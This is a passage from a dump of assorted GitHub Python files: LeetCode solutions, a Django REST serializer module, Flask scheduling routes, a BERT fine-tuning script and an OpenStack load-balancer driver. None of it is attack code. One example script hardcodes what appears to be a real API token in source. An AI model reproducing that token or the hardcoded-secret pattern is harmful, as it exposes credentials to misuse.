def read_bool(self):\n return self.read() != 0\n\n def read_byte(self):\n b = self.read()\n # print(b)\n return b - 256 if b > 127 else b\n\n def read_rgba8888(self):\n b = self.read(4)\n return '#%02x%02x%02x%02x' % (b[0], b[1], b[2], b[3])\n\n\nif __name__ == '__main__':\n result = Handler(open('data.skel', 'rb')).handle()\n # pprint.pprint(result)\n json.dump(result, open('data.json', 'w'))\n","repo_name":"CancerGary/sdorica-inspector","sub_path":"backend/api/skel2json.py","file_name":"skel2json.py","file_ext":"py","file_size_in_byte":22111,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"12453927347","text":"from typing import List\nclass Solution:\n def rotate(self, matrix: List[List[int]]) -> None:\n \n n = len(matrix[0])\n \n #--1.---Using New Memory----\n\n # new_matrix = []\n # for col in zip(*matrix):\n # col1 = list(col)\n # new_matrix.append(col1)\n # # print(new_matrix)\n # for i in range(n):\n # new_matrix[i].reverse()\n # return new_matrix\n\n #-------OR---2.-----Using Same Memory----\n\n # matrix = list(zip(*matrix))\n # for i in range(n):\n # matrix[i] = list(matrix[i])\n # for i in range(n):\n # matrix[i].reverse()\n # return matrix\n\n #-------OR----3.----Using Transpose---- \n\n for row in range(n):\n for col in range(row,n):\n matrix[col][row], matrix[row][col] = matrix[row][col], matrix[col][row]\n\n for i in range(n):\n matrix[i].reverse() \n return matrix\n \n\nobj = Solution()\nprint(obj.rotate([\n [ 5, 1, 9,11],\n [ 2, 4, 8,10],\n [13, 3, 6, 7],\n [15,14,12,16]\n]))","repo_name":"yashgoyl/LeetCode-Interview-Questions","sub_path":"Medium Interview Problems/Arrays and Strings/Rotate Image.py","file_name":"Rotate Image.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34036819549","text":"#!/usr/bin/env python\nfrom datetime import datetime\nimport os\nimport shutil\nimport subprocess\nimport click\n\n# Using UTC so the date is right just before the day unlocks\nTODAY = datetime.utcnow()\nROOT_PATH = os.path.dirname(os.path.realpath(__file__))\nTEMPLATE_PATH = os.path.join(ROOT_PATH, \"template.py\")\n\n\ndef validate_year(ctx, param, year):\n if year < 2015 or year > TODAY.year:\n raise click.BadParameter(f\"year should be in range [2015, {TODAY.year}]\")\n return year\n\n\ndef validate_day(ctx, param, day):\n if day < 1 or day > 25:\n raise click.BadParameter(\"day should be in range [0, 25]\")\n return day\n\n\n@click.command()\n@click.option(\"--year\", \"-y\", prompt=\"Year\", default=TODAY.year, callback=validate_year)\n@click.option(\"--day\", \"-d\", prompt=\"Day\", default=TODAY.day, callback=validate_day)\n@click.option(\"--open\", is_flag=True, default=False)\ndef main(year, day, open):\n day_path = os.path.join(ROOT_PATH, \"solutions\", f\"y{year}\", f\"d{day:02d}.py\")\n if os.path.exists(day_path):\n raise click.UsageError(f\"y{year}/d{day:02d}.py already exists\")\n\n shutil.copyfile(TEMPLATE_PATH, day_path)\n click.echo(f\"Created script for y{year}/d{day:02d}.py\")\n\n if open:\n subprocess.run(f\"code {day_path}\", shell=True, check=True)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Atlante45/advent-of-code","sub_path":"make_day.py","file_name":"make_day.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27443659305","text":"from pysis import SIS\nfrom pysis.exceptions import BadRequest\n\nif __name__ == \"__main__\":\n s = SIS(token=\"891fea6456f40f6369b824fb0a8ddcf0d983096f\",\n enableParamChecks=False)\n \n output = s.outputs.get(91)\n \n try:\n data = output.getData(timeStart=1412117100,\n timeEnd=1412120700,\n window=45)\n except BadRequest as ex:\n print(str(ex) + \"\\nBadRequest - OK\")\n \n \n \n \n","repo_name":"sustainableis/python-sis","sub_path":"examples/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"35947906002","text":"#Write a function that takes a string as input and returns a dictionary with the frequency of\r\n#each letter in the string.\r\n\r\ndef letter_frequency(string):\r\n frequency = {}\r\n for char in string:\r\n if char in frequency:\r\n frequency[char] += 1\r\n else:\r\n frequency[char] = 1\r\n return frequency\r\n","repo_name":"loydlobo7/Samarthya","sub_path":"problem14.py","file_name":"problem14.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38465261729","text":"from rest_framework import serializers\nfrom store.models import Product, Order, ProductInstance, CartProductInstance\n\n\nclass ProductInstanceSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProductInstance\n fields = '__all__'\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n product_instances = ProductInstanceSerializer(many=True, read_only=True)\n class Meta:\n model = Product\n fields = '__all__'\n\n\nclass CartProductInstanceSerializer(serializers.ModelSerializer):\n class Meta:\n model = CartProductInstance\n fields = '__all__'\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n cart_product_instances = CartProductInstanceSerializer(many=True)\n class Meta:\n model = Order\n fields = ('email', 'first_name', 'last_name', 'address1', 'address2',\n 'city', 'state', 'zip_code', 'card_token', 'captcha_token', 'total',\n 'cart_product_instances', 'stripe_id', 'gooten_id', 'dj_order_id')\n\n def create(self, validated_data):\n cart_product_list = validated_data.pop('cart_product_instances')\n cart_product_refs = []\n for cart_product in cart_product_list:\n obj, _ = CartProductInstance.objects.get_or_create(**cart_product)\n cart_product_refs.append(obj)\n\n order = Order.objects.create(**validated_data)\n order.cart_product_instances.set(cart_product_refs)\n return order\n","repo_name":"dmallon1/djstore-api","sub_path":"store/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71243419454","text":"from django.shortcuts import get_object_or_404\r\nfrom rest_framework import serializers\r\nfrom rest_framework.exceptions import ValidationError\r\n\r\nfrom reviews.models import (Category, Comment, Genre, Review,\r\n Title, User, UserRole)\r\n\r\n\r\nclass CategorySerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = Category\r\n fields = ['name', 'slug']\r\n\r\n\r\nclass GenreSerializer(serializers.ModelSerializer):\r\n class Meta:\r\n model = Genre\r\n fields = ['name', 'slug']\r\n\r\n\r\nclass TitleSerializer(serializers.ModelSerializer):\r\n genre = GenreSerializer(read_only=True, many=True)\r\n category = CategorySerializer(read_only=True)\r\n rating = serializers.IntegerField(read_only=True)\r\n\r\n class Meta:\r\n model = Title\r\n fields = [\r\n 'id', 'name', 'year', 'rating', 'description', 'genre', 'category']\r\n read_only_fields = ['id', 'name', 'year', 'description']\r\n\r\n\r\nclass TitleCUDSerializer(serializers.ModelSerializer):\r\n genre = serializers.SlugRelatedField(\r\n queryset=Genre.objects.all(), slug_field='slug', many=True)\r\n category = serializers.SlugRelatedField(\r\n queryset=Category.objects.all(), slug_field='slug')\r\n\r\n class Meta:\r\n model = Title\r\n fields = ['id', 'name', 'year', 'description', 'genre', 'category']\r\n\r\n\r\nclass CommentSerializer(serializers.ModelSerializer):\r\n author = serializers.SlugRelatedField(\r\n slug_field='username',\r\n read_only=True,\r\n )\r\n review = serializers.SlugRelatedField(\r\n read_only=True,\r\n slug_field='text'\r\n )\r\n\r\n class Meta:\r\n model = Comment\r\n fields = '__all__'\r\n\r\n\r\nclass ReviewSerializer(serializers.ModelSerializer):\r\n author = serializers.SlugRelatedField(\r\n slug_field='username',\r\n read_only=True,\r\n default=serializers.CurrentUserDefault(),\r\n )\r\n title = serializers.SlugRelatedField(\r\n slug_field='name',\r\n read_only=True\r\n )\r\n\r\n class Meta:\r\n model = Review\r\n fields = '__all__'\r\n\r\n def validate(self, data):\r\n request = self.context['request']\r\n author = request.user\r\n title_id = self.context['view'].kwargs.get('title_id')\r\n title = get_object_or_404(Title, pk=title_id)\r\n if request.method == 'POST':\r\n if Review.objects.filter(title=title, author=author).exists():\r\n raise ValidationError(\r\n 'Вы не можете повторно подписаться на автора'\r\n )\r\n return data\r\n\r\n\r\nclass UserSerializer(serializers.ModelSerializer):\r\n username = serializers.RegexField(regex=r'^[\\w.@+-]+\\Z', max_length=150)\r\n first_name = serializers.CharField(max_length=150, required=False)\r\n last_name = serializers.CharField(max_length=150, required=False)\r\n email = serializers.CharField(max_length=254)\r\n role = serializers.ChoiceField(\r\n choices=UserRole.get_all_roles(),\r\n default=UserRole.USER.value,\r\n required=False\r\n )\r\n\r\n class Meta:\r\n fields = (\r\n 'username',\r\n 'first_name',\r\n 'last_name',\r\n 'bio',\r\n 'role',\r\n 'email'\r\n )\r\n model = User\r\n\r\n def validate_username(self, username):\r\n if username == 'me':\r\n raise serializers.ValidationError(\r\n 'Недопустимое имя пользователя!'\r\n )\r\n duplicated_username = User.objects.filter(\r\n username=username\r\n ).exists()\r\n if duplicated_username:\r\n raise serializers.ValidationError(\r\n 'Пользователь с таким именем уже зарегистрирован'\r\n )\r\n return username\r\n\r\n def validate_email(self, email):\r\n duplicated_email = User.objects.filter(email=email).exists()\r\n if duplicated_email:\r\n raise serializers.ValidationError(\r\n 'Пользователь с таким email уже зарегистрирован'\r\n )\r\n return email\r\n\r\n\r\nclass GetCodeSerializer(serializers.Serializer):\r\n email = serializers.EmailField(max_length=254, required=True)\r\n username = serializers.RegexField(regex=r'^[\\w.@+-]+\\Z', max_length=150)\r\n\r\n def validate_username(self, username):\r\n return UserSerializer.validate_username(self, username)\r\n\r\n def validate_email(self, email):\r\n return UserSerializer.validate_email(self, email)\r\n\r\n\r\nclass GetTokenSerializer(serializers.Serializer):\r\n username = serializers.CharField(required=True)\r\n confirmation_code = serializers.CharField(required=True)\r\n","repo_name":"Alexsiiassa/api_yamdb","sub_path":"api_yamdb/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"30418454907","text":"from leezy import Solution, solution\n\nfrom collections import Counter\n\nclass Q1207(Solution):\n @solution\n def uniqueOccurrences(self, arr):\n # 48ms\n cnt = Counter(arr)\n return len(set(cnt.values())) == len(cnt)\n\n\ndef main():\n q = Q1207()\n q.add_args([1, 2, 2, 1, 1, 3])\n q.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aptend/leetcode-rua","sub_path":"Python/1207 - Unique Number of Occurrences/1207_unique-number-of-occurrences.py","file_name":"1207_unique-number-of-occurrences.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"37084885611","text":"from matplotlib import pyplot as plt\nimport numpy as np\nimport functions as func\nimport models as mod\nimport torch\nimport torch.nn as nn\nfrom torch.utils.tensorboard import SummaryWriter\nfrom sklearn import preprocessing\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import normalize\nimport seaborn as sns\nimport data_functions as df\nimport functions as f\n\nif __name__ == '__main__':\n\n # !!!----- Path to save down tensorboard logs -----!!!\n tb_path = \"bo_tb_logs/\"\n im_path = \"bo_images/\"\n\n # !!!----- Data distribution choices for features x -----!!!\n # For each run choose just one data distribution from ['gaussian', 'uniform', '2gaussian']\n # gaussian: symmetric gaussian with mean mu and covariance Sigma\n data_dist = 'gaussian'\n D = [300] # ambient data dimension e.g., [50,200,500]\n R = [2] # 'signal' dimension (classification depends only on the first r dimensions)\n Betas = [0.05] # proportion of corruptions, e.g., [0.01, 0.05, 0.1, 0.2]\n N = [500] # number of data points\n show_data_plot = False # Boolean, set to True to visualize data scatter diagram\n\n # !!!----- Student and teacher network choices -----!!!\n M = [500] # number of student neurons e.g., [50,200,500]\n student_type = 'Tanh'\n bias_status_list = [True, False]\n outer_train_list = [True, False]\n\n # !!!----- Optimizater choices -----!!!\n num_epochs = 12000 # Number of epochs\n plot_incs = np.concatenate((np.arange(0, 10, 1), np.arange(10, 100, 10), np.arange(100, num_epochs + 1, 100))) # Points when to compute test error etc.\n rtypes = ['none', 'fro', 'nuc'] # Choose subset of ['none', 'fro', 'nuc']\n rweights = [0.1, 0.01, 0.001] # Regularization weights to test\n step_size = 0.01\n\n # !!!----- Outcome thresholds -----!!!\n # Factors for classify different tests into categories of benign vs. non-benign overfit, fit or underfit.\n benign_ub = 1.2\n overfit_ub = 0.7\n fit_ub = 1.2\n\n\n for n in N:\n for m in M:\n for d in D:\n for r in R:\n # !!!----- Define teacher network ------!!!\n w_star = -(1 / np.sqrt(2)) * torch.cat((torch.ones(r), torch.zeros(d - r)))\n w_star = torch.reshape(w_star, (1, d))\n teacher = mod.One_Hidden_Layer_Model_Tanh(d, 1, bias_status = False)\n teacher.fc1.weight = nn.Parameter(w_star, requires_grad=False)\n for beta in Betas:\n if data_dist == 'gaussian':\n # Define data distribution\n num_clusters = 2 # define number of clusters\n mu = torch.cat((3*torch.ones(2), torch.zeros(d-2)), 0)\n mu = [mu, -mu] # make a list of mean vectors one for each cluster\n Sigma = torch.eye(d) # Define covariance matrix for each cluster\n train_x, train_y, test_x, test_y, num_corrupted = df.generate_data(n, d, beta, teacher, data_dist, mu=mu, Sigma=Sigma, num_clusters=num_clusters)\n else:\n print(\"data_dist_not_recognized\")\n\n # Plot to check data looks correct\n if show_data_plot:\n plot_x = train_x.numpy()\n plot_y = train_y.numpy().reshape(n)\n sns.scatterplot(plot_x[:,0], plot_x[:,1], hue=plot_y)\n plt.legend()\n plt.show()\n\n for bias_status in bias_status_list:\n for outer_train in outer_train_list:\n for l in range(len(rtypes)):\n if rtypes[l] == 'none':\n num_rweights = 1\n else:\n num_rweights = len(rweights)\n for k in range(num_rweights):\n loss_fn = mod.MSE_regularized(rtypes[l], rweights[k])\n if rtypes[l] == 'none':\n log_path = tb_path + data_dist + \"_nClusters-\" + str(num_clusters) + \"_trainOuter-\" + str(outer_train) + \"_act-\" + student_type + \"_bias-\" + str(bias_status) + \"_n\" + str(n) + \"_m\" + str(m) + \"_d\" + str(d) + \"_r\" + str(r) + \"_beta\" + str(\n beta) + \"_regtype-\" + rtypes[l]\n else:\n log_path = tb_path + data_dist + \"_nClusters-\" + str(num_clusters) + \"_trainOuter-\" + str(outer_train) + \"_act-\" + student_type + \"_bias-\" + str(bias_status) + \"_n\" + str(n) + \"_m\" + str(m) + \"_d\" + str(\n d) + \"_d\" + str(r) + \"_beta\" + str(\n beta) + \"_regtype-\" + rtypes[l] + \"_rweight-\" + str(rweights[k])\n writer = SummaryWriter(log_path)\n\n # # !!!----- Define student neuron and optimizer ------!!!\n student = mod.One_Hidden_Layer_Model_Tanh(d, m, bias_status, outer_train)\n optimizer = torch.optim.SGD(student.parameters(), step_size)\n\n student, final_test, final_train = f.train_model(writer, student, optimizer, loss_fn, train_x, train_y, test_x, test_y, num_epochs,\n num_corrupted, plot_incs, n, n, np.reshape(((w_star).detach()).numpy(), (d)))\n potential_bo = \"unlikely\"\n print(\"Training complete for following experiment run:\")\n print(log_path)\n print(\"Final train error: \" + str(final_train))\n print(\"Final test error: \" + str(final_test))\n\n if final_test <= benign_ub*beta:\n test_outcome = \"benign\"\n else:\n test_outcome = \"non-benign\"\n\n if final_train <= overfit_ub*beta:\n training_outcome = \"overfit\"\n elif final_train > overfit_ub*beta and final_train<=fit_ub*beta:\n training_outcome = \"fit\"\n else:\n training_outcome = \"underfit\"\n\n print(\"OUTCOME: \" + test_outcome + \" \" + training_outcome)\n\n\n\n\n","repo_name":"mm5110/benign-overfitting","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"39476195915","text":"import copy\nfrom sqlalchemy import and_, or_, between, func, inspect\nfrom flask import jsonify, request, json, make_response\nfrom flask_mail import Message\nfrom flask_jwt_extended import (create_access_token,\ncreate_refresh_token, jwt_required,\nget_jwt_identity, get_jti)\nfrom datetime import timedelta, datetime\n\nfrom main import app, bcrypt, jwt, mail\nfrom setup.extensions import db\nfrom models import (Test, Users, Calendar, TokenBlacklist, Beams, Organization, requests,\n Integrator, Ranges)\nfrom setup.exceptions import TokenNotFound\nfrom pdf_builder import FormBuilder\n\n# Create a range of time that an integrator has bought\n@app.route('/api/integrator/set-range', methods=['POST'])\n@jwt_required\ndef set_range():\n username = get_jwt_identity()\n req = request.get_json()\n result = \"\"\n\n try:\n user = Users.query.filter_by(username=username).first()\n if user.user_type != 'Integrator':\n raise Exception(\"You must be an integrator to view this page!\")\n myOrg = Organization.query.filter_by(abbrv=user.affiliation).first()\n startDate = req['startDate']\n startTime = req['startTime']\n date = datetime.strptime(startDate, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n time = datetime.strptime(startTime, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n timeDelta = timedelta(hours = time.hour, minutes = time.minute)\n date = date + timeDelta\n entry = Ranges(org_id=myOrg.id, start_date=date, hours=req['hours'],\n facility=req['facility'], scheduled=False)\n result = entry.create_range()\n\n return jsonify({'success': True}), 200\n\n except Exception as e:\n print(e)\n result = {'error' : str(e),\n 'success' : False}\n\n return jsonify(result)\n\n# Gets ranges\n@app.route('/api/integrator/get-range', methods=['GET'])\n@jwt_required\ndef get_range():\n username = get_jwt_identity()\n result = \"\"\n\n try:\n user = Users.query.filter_by(username=username).first()\n if user.user_type != 'Integrator':\n raise Exception(\"You must be an integrator to view this page!\")\n myOrg = Organization.query.filter_by(abbrv=user.affiliation).first()\n myList = []\n ranges = Ranges.query.filter_by(org_id=myOrg.id).all()\n for rang in ranges:\n timeDelta = timedelta(hours = rang.hours)\n end = rang.start_date + timeDelta\n start = rang.start_date.strftime(\"%Y-%m-%dT%H:%M:%S\")\n end = end.strftime(\"%Y-%m-%dT%H:%M:%S\")\n entry = {\"facility\" : rang.facility, \"hours\" : rang.hours,\n \"startDate\" : start, \"endDate\" : end, \"id\" : rang.id, \"scheduled\" : rang.scheduled}\n myList.append(entry)\n\n return {\"ranges\" : myList}, 200\n\n except Exception as e:\n print(e)\n result = {'error' : str(e),\n 'success' : False}\n\n return jsonify(result)\n\n# Sets priority for requests to be scheduled\n# Handled in frontend so depreciated\n@app.route('/api/request/priority', methods=['POST'])\n@jwt_required\ndef set_priority():\n result = \"\"\n req = request.get_json()\n\n try:\n beam_requests = requests.query.filter(requests.id.in_(req['ids']))\n if req['add']:\n for form in beam_requests:\n form.priority = True\n else:\n for form in beam_requests:\n form.priority = False\n\n db.session.commit()\n \n result = {'success' : True}\n\n except Exception as e:\n print(e)\n result = {'error' : str(e),\n 'success' : False}\n\n return result","repo_name":"ericdoppelt/mda-app","sub_path":"backend/routes/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38832535407","text":"# Import necessary libraries\nfrom datasets import load_dataset\nfrom transformers import AutoTokenizer\nimport numpy as np\nfrom transformers import Trainer\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom transformers import AutoModelForSequenceClassification\nfrom torch.optim import AdamW\nfrom transformers import get_scheduler\nimport torch\nimport evaluate\nfrom tqdm.auto import tqdm\nfrom torch.nn.parallel import DataParallel\nimport argparse\n\n# Define the main function\ndef main():\n # Create an ArgumentParser object to handle command-line arguments\n parser = argparse.ArgumentParser(description=\"Argument Reader\")\n\n # Add command-line arguments with default values\n parser.add_argument(\"-m\", \"--model_path\", help=\"Path of model to fine-tune\", default=\"bert-base-cased\")\n parser.add_argument(\"-t\", \"--train_path\", help=\"Path of training data as csv\", default=\"./train_labeled.csv\")\n parser.add_argument(\"-v\", \"--test_path\", help=\"Path of test data as csv\", default=\"./test_labeled.csv\")\n parser.add_argument(\"-s\", \"--save_model_path\", help=\"Path to save the fine-tuned model\", default=\"./pretrained_sarcasm_on_bert\")\n\n # Parse the command-line arguments\n args = parser.parse_args()\n train_path = args.train_path\n test_path = args.test_path\n model_path = args.model_path\n save_model_path = args.save_model_path\n\n # Load test and train datasets from CSV files\n test_dataset = load_dataset(\"csv\", data_files=test_path, sep=\",\")\n train_dataset = load_dataset(\"csv\", data_files=train_path, sep=\",\")\n train_ds = train_dataset[\"train\"]\n test_ds = test_dataset[\"train\"]\n\n # Initialize a tokenizer for BERT\n tokenizer = AutoTokenizer.from_pretrained(\"bert-base-cased\")\n\n # Define a function to tokenize input examples\n def tokenize_function(examples):\n return tokenizer(examples[\"tweets\"], padding=\"max_length\", truncation=True, return_tensors=\"pt\")\n\n # Tokenize the test dataset\n tokenized_test_datasets = test_ds.map(tokenize_function, batched=True)\n tokenized_test_datasets = tokenized_test_datasets.remove_columns([\"tweets\"])\n tokenized_test_datasets = tokenized_test_datasets.rename_column(\"class\", \"labels\")\n tokenized_test_datasets.set_format(\"torch\")\n\n # Tokenize the train dataset\n tokenized_train_datasets = train_ds.map(tokenize_function, batched=True)\n tokenized_train_datasets = tokenized_train_datasets.remove_columns([\"tweets\"])\n tokenized_train_datasets = tokenized_train_datasets.rename_column(\"class\", \"labels\")\n tokenized_train_datasets.set_format(\"torch\")\n\n # Shuffle the train and test datasets\n train_dataset = tokenized_train_datasets.shuffle(seed=42)\n eval_dataset = tokenized_test_datasets.shuffle(seed=42)\n\n # Load the evaluation metric (e.g., accuracy)\n metric = evaluate.load(\"accuracy\")\n\n # Create data loaders for training and evaluation\n train_dataloader = DataLoader(train_dataset, shuffle=True, batch_size=8)\n eval_dataloader = DataLoader(eval_dataset, batch_size=8)\n\n # Load the model for sequence classification with the specified number of labels (2 in this case)\n model = AutoModelForSequenceClassification.from_pretrained(model_path, num_labels=2)\n\n # Check if CUDA (GPU) is available and configure device\n if torch.cuda.is_available():\n print(\"cuda\")\n device = torch.device(\"cuda\")\n print(\"device count =\", torch.cuda.device_count())\n if torch.cuda.device_count() > 1:\n model = DataParallel(model) # Wrap the model with DataParallel for multiple GPUs\n else:\n device = torch.device(\"cpu\")\n print(\"cpu\")\n\n # Initialize the AdamW optimizer\n optimizer = AdamW(model.parameters(), lr=5e-5)\n\n # Create a learning rate scheduler\n num_epochs = 3\n num_training_steps = num_epochs * len(train_dataloader)\n lr_scheduler = get_scheduler(\n name=\"linear\", optimizer=optimizer, num_warmup_steps=0, num_training_steps=num_training_steps\n )\n\n # Move the model to the selected device (CPU or GPU)\n model.to(device)\n\n # Create a progress bar for training\n progress_bar = tqdm(range(num_training_steps))\n\n # Set the model in training mode\n model.train()\n\n # Training loop\n for _ in range(num_epochs):\n for batch in train_dataloader:\n batch = {k: v.to(device) for k, v in batch.items()}\n outputs = model(**batch)\n loss = outputs.loss\n loss = loss.mean()\n loss.backward()\n\n optimizer.step()\n lr_scheduler.step()\n optimizer.zero_grad()\n progress_bar.update(1)\n\n # Save the fine-tuned model\n model.module.save_pretrained(save_model_path)\n print(\"Model saved\")\n\n# Entry point for the script\nif __name__ == \"__main__\":\n main()\n\n# Function for single tests of the model's accuracy, returns an integer\ndef single_test(input_str):\n batch = tokenizer(input_str, padding=\"max_length\", truncation=True, return_tensors=\"pt\")\n batch = {k: v.to(device) for k, v in batch.items()}\n with torch.no_grad():\n outputs = model(**batch)\n logits = outputs.logits\n predictions = torch.argmax(logits, dim=-1)\n return predictions.item()\n","repo_name":"galamit1/TAU-Workshop","sub_path":"fine_tuning/fine_tune_sarcasm.py","file_name":"fine_tune_sarcasm.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9933104141","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n#\n\nfrom array_neutron_lbaas.device_driver import device_driver\nfrom neutron_lbaas.drivers import driver_base\nimport threading\nimport logging\nimport traceback\n\nLOG = logging.getLogger(__name__)\n\nclass ArrayLoadBalancerDriver(driver_base.LoadBalancerBaseDriver):\n\n def __init__(self, plugin):\n super(ArrayLoadBalancerDriver, self).__init__(plugin)\n self.load_balancer = ArrayLoadBalancerManager(self)\n self.listener = ArrayListenerManager(self)\n self.pool = ArrayPoolManager(self)\n self.member = ArrayMemberManager(self)\n self.health_monitor = ArrayHealthMonitorManager(self)\n self.device_driver = device_driver.ArrayDeviceDriverV2(plugin)\n\n\nclass ArrayLoadBalancerManager(driver_base.BaseLoadBalancerManager):\n def create(self, context, obj):\n thread = threading.Thread(target=self._create, args=(context, obj))\n thread.start()\n\n def _create(self, context, obj):\n try:\n self.driver.device_driver.create_loadbalancer(context, obj)\n self.successful_completion(context, obj)\n except Exception as e:\n LOG.debug(\"trace is below: %s\", traceback.format_exc())\n self.failed_completion(context, obj)\n\n def update(self, context, old_obj, obj):\n try:\n self.driver.device_driver.update_loadbalancer(context, obj, old_obj)\n self.successful_completion(context, obj)\n except Exception as e:\n self.failed_completion(context, obj)\n\n def delete(self, context, obj):\n try:\n self.driver.device_driver.delete_loadbalancer(context, obj)\n except Exception:\n pass\n self.successful_completion(context, obj, delete=True)\n\n def refresh(self, context, lb_obj):\n self.driver.device_driver.refresh(context, lb_obj)\n\n def stats(self, context, lb_obj):\n return self.driver.device_driver.stats(context, lb_obj)\n\n\nclass ArrayListenerManager(driver_base.BaseListenerManager):\n def create(self, context, obj):\n try:\n self.driver.device_driver.create_listener(context, obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def update(self, context, old_obj, obj):\n try:\n self.driver.device_driver.update_listener(context, obj, old_obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def delete(self, context, obj):\n try:\n self.driver.device_driver.delete_listener(context, obj)\n except Exception:\n pass\n self.successful_completion(context, obj, delete=True)\n\n\nclass ArrayPoolManager(driver_base.BasePoolManager):\n def create(self, context, obj):\n try:\n self.driver.device_driver.create_pool(context, obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def update(self, context, old_obj, obj):\n try:\n self.driver.device_driver.update_pool(context, obj, old_obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def delete(self, context, obj):\n try:\n self.driver.device_driver.delete_pool(context, obj)\n except Exception:\n pass\n self.successful_completion(context, obj, delete=True)\n\n\nclass ArrayMemberManager(driver_base.BaseMemberManager):\n def create(self, context, obj):\n try:\n self.driver.device_driver.create_member(context, obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def update(self, context, old_obj, obj):\n try:\n self.driver.device_driver.update_member(context, obj, old_obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def delete(self, context, obj):\n try:\n self.driver.device_driver.delete_member(context, obj)\n except Exception:\n pass\n self.successful_completion(context, obj, delete=True)\n\n def get(self, context, obj):\n try:\n status = self.driver.device_driver.get_member_health(context, obj)\n except Exception:\n status = \"UNKNOWN\"\n return status\n\n\nclass ArrayHealthMonitorManager(driver_base.BaseHealthMonitorManager):\n def create(self, context, obj):\n try:\n self.driver.device_driver.create_healthmonitor(context, obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def update(self, context, old_obj, obj):\n try:\n self.driver.device_driver.update_healthmonitor(context, obj, old_obj)\n self.successful_completion(context, obj)\n except Exception:\n self.failed_completion(context, obj)\n\n def delete(self, context, obj):\n try:\n self.driver.device_driver.delete_healthmonitor(context, obj)\n except Exception:\n pass\n self.successful_completion(context, obj, delete=True)\n\n","repo_name":"jarod-w/array-lbaasv2-vapv","sub_path":"array_neutron_lbaas/driver/driver_v2.py","file_name":"driver_v2.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13060629943","text":"import numpy as np\nimport pandas as pd\nimport time\n\n\nclass GruBaseNp(object):\n def __init__(self,is_straining, session_key, item_key, time_key, batch_size, embedding = 0 ,\n hidden_act = 'tanh', final_act='elu-0.5', loss=\"bpr\", grad_cap=0, layers=[100], rnn_size=100, n_epochs=10,\n learning_rate=0.1, checkpoint_dir=\"\",\n adapt=\"adagrad\", pre_embedding_y=0, pre_embedding_x=0, ):\n \"\"\"\n :param session_key: string, header of the session ID column in the input file (default: 'SessionId')\n :param item_key: string, header of the item ID column in the input file (default: 'ItemId')\n :param time_key: string\n :param layers: list of int values, list of the number of GRU units in the layers (default : [100])\n :param batch_size : int, size of the minibacth, also effect the number of negative samples through minibatch based sampling (default: 32)\n :param pre_embedding_y: int, size of the embedding used for output\n :param pre_embedding_x: int, size of the embedding used for input\n :param embedding : int, size of the embedding used, 0 means not to use embedding (default: 0)\n :param adapt: string, sets the appropriate learning rate adaptation strategy, (default: \"adagrad\")\n :param hidden_act: string, 'linear', 'relu', 'tanh', 'leaky-', 'elu-', 'selu--' selects the activation function on the hidden states, and are the parameters of the activation function (default : 'tanh')\n :param final_act : 'softmax', 'linear', 'relu', 'tanh', 'softmax_logit', 'leaky-', 'elu-', 'selu--' selects the activation function of the final layer, and are the parameters of the activation function (default : 'elu-1')\n \"\"\"\n self.is_training = is_straining\n self.session_key = session_key\n self.item_key = item_key\n self.time_key = time_key\n self.batch_size = batch_size\n self.embedding = embedding\n self.pre_embedding_x = 